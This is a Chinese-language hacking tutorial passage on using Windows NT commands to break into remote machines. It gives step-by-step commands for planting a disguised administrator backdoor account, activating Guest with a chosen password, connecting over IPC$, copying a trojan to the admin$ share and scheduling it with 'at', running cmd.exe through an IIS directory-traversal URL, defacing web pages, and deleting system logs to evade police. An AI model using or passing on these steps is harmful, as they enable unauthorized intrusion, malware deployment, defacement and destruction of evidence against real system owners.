4、对网络命令的熟悉
1)、NET
下面的操作你TELNET到对方主机上才会有效果。
你也可以在本地演示:
我要添加一个用户,为了让对方难察觉,最好贴加一个用户和系统用户差不多的
比如admin
net user admin password /add
再将这个用户加到管理组
net localgroup administrator admin /add
这样就算一个后门做好了!这台机子也就可以说是你的肉鸡了。
net start telnet
这样可以打开对方的TELNET服务.
为了防止admin用户被察觉
将Guest用户激活,guest是NT的默认用户,而且很难删除的
net user guest /active:yes
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina。
net user guest lovechina
一般IPC$入侵用NET比较多吧
基本命令是
net use \\211.15.66.169\ipc% "123456" /user:"qiker" (这个IP是我的,可千万别黑哦)
123456是密码,qiker是用户
退出的命令是
net use \\\ipc$ /delte
先别急着退出,查看硬盘上的东西,就把它的C盘映射到我的Z盘吧!
net use z:\\211.15.66.169\c$
at命令是用来运行程序的
一般你会复制一个木马上去
COPY C:\binhe.exe \\211.15.66.169\admin$
在运行之前,你还必须要先知道他的时间
net time \\211.15.66.169
将会返回一个时间,这里假设时间为2:05,现在需要新建一个作业,其ID=1
at \\211.15.66.169 2:07 binhe.exe
2)、set
要黑别人网页必须要知道他的目录是在哪里的,默认情况一般会在c:\inetup\wwwroot
登陆到对方机子打入SET命令就可以看到:
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=211.15.66.169
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot(大家看到这里没有,这就是网站的目录了。)
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
script_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
要黑很容易,只要把自己准备好的网页替换上去就是了,默认主页名称一般会是default.htm,default.asp,index.html,index.htm,index.asp
3)、nbtstat
这个命令非常的重要,一般你也许会听说139端口开着有多危险,因为你只要开着,就可以通过NETSTAT来得到用户,只要破解出来了, 那你的机子就完蛋了。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大写哦。
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
<03>前面的就是用户。
这里的用户是PENTIUMII。
4)、attrib
这个是去只读命令
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读
attrib +r index.htm
5)、netstat
这个命令,我称它为监听命令,只要我和某台机子通讯,我就可以得到他的IP
netstat -an
不过你的速度一定要比快
6)、echo
echo 奇客>index.htm
echo 奇客>>index.htm
第一个的意思是覆盖index.htm原有的内容,把“奇客”写进index.htm。
第二个的意思是把“奇客”加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地测试
7)、del
现在的网警可不是喝粥的,不会两手发软,你还是赶快清理你的脚印,就是所谓的日志。
NT/2000的日志有这些需要删除了。
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
用小榕的工具也可以,你只要把文件复制上去,再打几个命令,就行
